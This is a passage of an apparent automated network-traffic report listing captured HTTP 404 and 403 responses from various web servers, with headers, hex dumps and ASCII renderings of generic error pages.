65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:11 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: Gtev1tWy/haFqglkzData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:11 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471571.2231478034088127903Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLqMQhUjPXFZZ6QMfhZ0ZUmYa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalheeXEm7zbEGbN14cgagj0+7/2E86QVq9BnsHvbzLGWiOjw033DwPcQNea77hySx/w==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,alGcl2prlCF8HwMfrZ9rYKH+o92Cjgvs4rLz3S3oAKE=,/j+AjfLiOiE0Vc9NsP8sK7gAAzzliq9iePftiHVq5jlJpdGUXXdihYUPcFwLcUQYLPdrIc1H06/OFwdhz0Sadw==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 96 93 c2 4e 26 05 e8 b2 0c cd cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 31 e7 8c 71 7e 79 74 94 1d 97 b6 08 eb 06 58 15 6a 7d 89 67 ce 8f 18 7e e8 36 23 1a 33 0b 2e 9b 26 8f 96 6a 75 ed 9c 75 bf cb 05 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 36 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 51 46 05 25 35 f7 85 d4 90 a7 27 ac 96 2b 55 b7 f5 7f 84 d6 83 eb 4e 72 86 2f 8c 45 7d 1b 45 45 25 9d 07 14 dc 86 39 9f ee 5c 54 21 34 1c be b6 ea 3e 8f fe e2 1f df f3 2b 5b 37 32 28 94 b0 63 ce cd 75 0e e5 02 7a be a0 82 06 02 39 53 a6 cc a3 b8 41 78 5f 3a 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 31 dc 12 7c e1 54 13 94 35 3b 2a 76 6c 3a c0 2b 7b 5c ce ce 6c f0 3b 72 8d 45 2b 61 75 c2 8c 9d 5b ad ed b2 67 d9 06 94 42 97 69 65 ee 18 05 35 8f 54 8d 70 44 63 16 11 ab 1c cc f3 48 88 e5 72 99 60 2c 93 c2 d6 62 2e 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 27 bc 17 bd 91 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 b5 98 63 2e 78 f1 01 f4 3d 20 8f ec ce bf ca 02 39 3c e2 eb 55 87 b5 06 5f 01 60 ea f4 d6 07 58 05 d1 3d 10 9d db 77 60 f6 96 ec f1 3d d7 34 74 00 6f da 99 56 85 48 93 49 7a 9e 8c 84 ef d4 0b a0 1c 47 a3 31 c9 07 52 67 e2 43 fd 99 e8 33 3f 9b d9 72 cd b4 34 8b 3c 02 8c 3f Data Ascii: 443Vo6_E-N&0l((Z:[L(R%F}w9ql7c1q~ytXj}g~6#3.&juuM%jYC+X60XP%xw8QF%5'+UNr/E}EE%9\T!4>+[72(cuz9SAx_:baI81\|T5;*vl:+{\l;rE+au[gBie5TpDcHr`,b.1$$1:\|+'HN(E+9^c.x= 9<U_`X=w`=4toVHIzG1RgC3?r4<?
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:11 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:11 GMTcontent-type: text/html; charset=iso-8859-1content-length: 196server: Apachex-iplb-request-id: BF60E3DE:E8E8_D5BA2104:0050_65D53513_D6AD:19A2x-iplb-instance: 51886Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:11 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:11 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: Gtev1tWy/Y1Q2e3AAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:11 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:11 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:11 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:11 GMTContent-Length: 13681Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:11 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471571.8041474576110125755Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLrb3eKb2faxipHpDHW1Enb5/HubKAh1QhTB6OuUXtTGV,2d58ifebGbosy5xc+FRalqL0nQnEA3y75sfTMFFEpDD5YDxchWjcpg+/I0IXVGKaCBKpq3nPY1N6rHRwSWtdlw==,2UNV7KOq4oGjA5+PKsX47HNYW5FMKOqazjq32++LUUhYgeUJqUXtid+86vZww+nL,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,HFwuyehutl8tT21go4rzKQuGWFn2wMQWjizQyxww5Ro=,/j+AjfLiOiE0Vc9NsP8sK3wn3HKfNyHsngqdvH35wynwHI026nY8X82AVI4uc6ntz725C8t8ZYCuhGMAdFHN2Q==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 96 67 cf 69 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 75 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 29 e7 8c 71 7e 79 72 92 9d 96 b6 08 9b 06 58 15 6a 7d 89 67 ce 4f 18 7e e8 36 23 1a 33 4b 2e 9b 26 8f 56 6a 7d ed 9c 75 bf cb 25 f8 b7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 35 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 53 46 05 25 35 f7 85 d4 90 a7 67 ac 96 6b 55 b7 f5 7f 84 d6 83 eb 4e 72 8e 2f 8c 45 7d 5b 45 45 25 9d 07 14 dc 86 05 3f df bb a8 42 68 38 7c 6e d5 7d 1e fd c5 df bf e5 57 b6 6e 64 50 28 61 cf 9c 9b eb 1c ca 25 f4 7c 41 05 0d 04 72 ae 4c 99 47 71 83 f0 3e 75 c4 98 fd c3 82 93 c6 6b 19 f0 71 26 3a ea b7 70 4b f0 85 53 4d 50 d6 ec a9 d8 b3 e9 08 af 1c 70 39 3b b7 c1 ef c9 35 16 ad 84 f5 19 33 76 61 b5 b6 ab 9e 65 17 50 0a 5d a6 95 b9 63 14 d4 3c 52 35 c2 11 8d 59 46 ac 72 b0 c8 23 21 56 ab 55 82 b1 4c 0a 5b 8b 85 c4 90 58 93 e0 57 c4 1c e8 3c f2 15 86 ae 68 03 23 fa 81 f0 5e f4 56 92 0f e8 da 22 69 a4 93 3e 58 87 9a 3a a1 18 37 0a b4 17 a1 52 ae e4 78 1d 36 62 81 b9 e0 c5 af a0 ef 01 79 64 77 7e 27 0b e4 f0 88 af 57 1d 36 1a 7c 05 80 a9 d3 5b 1f 60 1d 44 f7 40 74 6e df 83 d9 5b 72 c0 f7 54 d3 d0 01 bc 69 e7 5a 15 22 4d 66 e9 9b 64 24 7c a7 5e 00 e5 38 1a 8d 49 3e 90 3a 13 1f ea cf 44 9f f9 d9 dc 96 1b a6 a5 59 e6 11 60 fc Data Ascii: 